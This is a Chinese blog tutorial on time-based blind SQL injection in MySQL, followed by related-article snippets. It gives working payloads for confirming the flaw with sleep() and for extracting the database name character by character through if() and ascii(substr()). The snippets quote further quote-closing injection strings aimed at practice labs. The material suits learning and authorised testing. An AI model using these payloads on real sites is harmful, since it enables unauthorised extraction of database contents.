MySQLsleep盲注

最新推荐文章于 2022-11-26 11:58:47 发布
最新推荐文章于 2022-11-26 11:58:47 发布
阅读量321 收藏
点赞数
分类专栏: web安全 文章标签: 数据库 php sqlite database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fdhdgsdfdsa/article/details/114694672
版权
  1. 判断是否存在漏洞
    在and 1=1和and 1=2不起作用的情况下,使用sleep()辅助判断
04.php?id=1 and sleep(5)

浏览器出现缓冲时说明生效,但是也可能因为网络原因导致的缓冲

IF(expr1,expr2,expr3)

如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL),则 IF()的返回值为expr2; 否则返回值则为 expr3。IF() 的返回值为数字值或字符串值,具体情况视其所在语境而定。
2.一一猜解数据库名长度

04.php?id=1 and if((length(database()))>6,sleep(5),1)

3.猜当前数据库第一个字母的ASCII值

04.php?id=1 and if(ascii(substr(database(),1,1))>114,sleep(5),1)

下面步骤与布尔盲注步骤相同,只需把语法稍作更改就行
用手工注入太费时,需配合工具使用,如kali、脚本,此为命令演示
4.猜出当前数据库的表名的第一个字母的ASCII值
5.猜出所选表下的所有字段
6.猜出所选字段下的数据

fdhdgsdfdsa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
《WEB安全渗透测试》(4)SQL入实战:时间
午夜观星河
10-02 8138
《WEB安全渗透测试》(4)SQL入实战:时间 时间:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。1)考虑使用时间访问URL:http://www.tianchi.com/web/time.php?id=1返回yes......
深入浅出带你学习时间
Galaxy_0的博客
02-19 433
深入浅出带你学习时间
MySQL:基于时间延迟入(Sleep函数)
m0_51428325的博客
11-16 6065
这里靶场我们还是以“SQLi-Labs”为实战来讲解吧! 一、判断入点 常用的判断语句: ' and if(1=0,1, sleep(10)) --+ " and if(1=0,1, sleep(10)) --+ ) and if(1=0,1, sleep(10)) --+ ') and if(1=0,1, sleep(10)) --+ ") and if(1=0,1, sleep(10)) --+ 入示例: http://127.0.0.1/sqli-labs/Less-
时间(延迟入)
qq_51954912的博客
04-25 1万+
时间简介 时间,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
MySql入的基本了解
xf555er的博客
08-26 315
描述mysql的基本入攻击, 给大家带来各种详细的攻击手段以及mysql语句的原理
mysql时间 入 sleep_SQL入之基于时间的过程
weixin_31184569的博客
01-28 995
0x00 概述由于要使用到基于时间的,但是我觉得基于时间的其实就是基于布尔的的升级版,所以我想顺便把基于布尔的分析总结了;首先我觉得基于时间的和基于布尔的的最直观的差别就是“参照物”不同,也就是说基于布尔的,其实是可以通过页面的一些变化来进行判断结果!但是有的时候,执行一些sql语句的测试,页面不会有像布尔的时候比较直观的变化,所以这个时候所谓的基于时间的,也就...
MySQL Sleep连接过多问题解决方法
09-10
主要介绍了MySQL Sleep连接过多问题解决方法,MySQL Sleep连接过多一般多为客户端没关闭连接导致的,解决方法很简单,修改一下配置文件即可,需要的朋友可以参考下
Sql入系列详解(一)---基于时间差的
AI.PLAY
05-07 1万+
Sql 基于时间的   基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0. 例如: 于是sleep(N)这个语句在这种情况下起到了非常大的作用。  Select sleep(N)可以让此语句运行n秒钟。 但是如果查询语句的条件不存在,执行的时间便是0,利用该函数
10、入篇--【时间、延时入】
WX公众号-小白学安全
04-05 1566
文章目录原理利用防范靶场 原理 利用 防范 靶场
⑦基于时间型SQL
熊俊坤的博客
11-06 7872
基于时间型SQL
CTF实验吧-who are you?【基于sleep脚本】
Sp4rkW的博客
07-21 5488
原题链接:http://ctf5.shiyanbar.com/web/wonderkun/index.php 首先打开链接看到显示your ip is : xxx 首先想到这个题目与ip有关系,即与X-Forwarded-For存在一定关系 实验了一下,这里使用了google的Modify-http-headers插件进行修改ip为127.0.0.1,发现链接打开显示确实改变了,但是依旧...
SQL(延时入)
JKding123的博客
04-02 1万+
思路: *判断是否存在入,入是字符型还是数字型 *猜解当前数据库名 *猜解数据库表名 *猜解字段名 *猜解数据 1判断入类型 playload result 1’ and sleep(5) # 延迟 1 and sleep(5)# 没有延迟 存在字符型入 2猜解当前数据库名 2.1猜解数据库名的长度: playload result 1’ and i...
MySQL 最全实例讲
kuxing100的专栏
04-19 1795
作者:YoCo Smart 来自:Silic Group Hacker Army 网址:http://blackbap.org 本文实例来自习科论坛交流三群。这个入点可以使用错误回显入来爆数据,本文出于 讲解的目的,使用更麻烦的。 阅读本文,需要有一点点SQL 基础。理解起来其实非常简单,就是做起来非常费劲 我们先来看入点,是一个B2B 网站建站公司: http://w
实验吧 who are you? By Assassin 时间
Assassin
01-29 6791
说真的这是我第一次接触时间,而且这还是简单的时间…不过感觉题目还是有一定难度的。首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:Client-IP x-remote-IP x-originating-IP x-remote-addr 但是这里当然是还是用X-FO
MySQL延时
一个普普通通的博客
03-01 1387
Mysql延时
iwebsec靶场 SQL入漏洞通关笔记4- sleep入(时间型
mooyuan的博客
11-26 1538
iwebsec靶场的SQL入漏洞的第04关sleep入漏洞渗透,iwebsec靶场的时间型由于没有任何过滤信息,与bool型一样为数字型布尔,故而使用sqlmap渗透十分方便高效。时间型相对而言十分耗时,手或者半自动化入相对而言操作过程较为麻烦,初学者还是应该以手动与半自动化入结合方法练习,真正了解原理后可以在使用sqlmap来提升速度。
SQL入:sleep()函数相关解决方案
一杯咖啡的渗透记忆
08-14 6637
最近做安全扫描的时候,经常遇到sleep()型的SQL入,这个是request发送后会产生一个timeout的delay,没有respond。 跟我之前遇到的一般意思SQL入不一样,之前的是SQL语句拼接产生的入,会通过入点抓到数据库。 这个相当于一种DDOS攻击,向数据库不停的发送request,不会很快释放连接,连接池会慢,导致数据库不响应。   解决方案:    在MY...
SQL(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
原理 的分类 常用函数 的利用方法 一、SQL概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的来获取信息。 2.是不能通过直接显示的途径来获取数据库数据的方法。 可以分为三类: 布尔 时间 报错型 1、布尔 查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
mysqlsleep函数
最新发布
09-16
MySQL并没有内置的mysqlsleep函数。然而,您可以使用SELECT语句结合SLEEP函数来实现类似的效果。SLEEP函数用于在查询中引入延迟。 例如,要在MySQL中引入5秒的延迟,可以执行以下查询: ``` SELECT SLEEP(5); ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值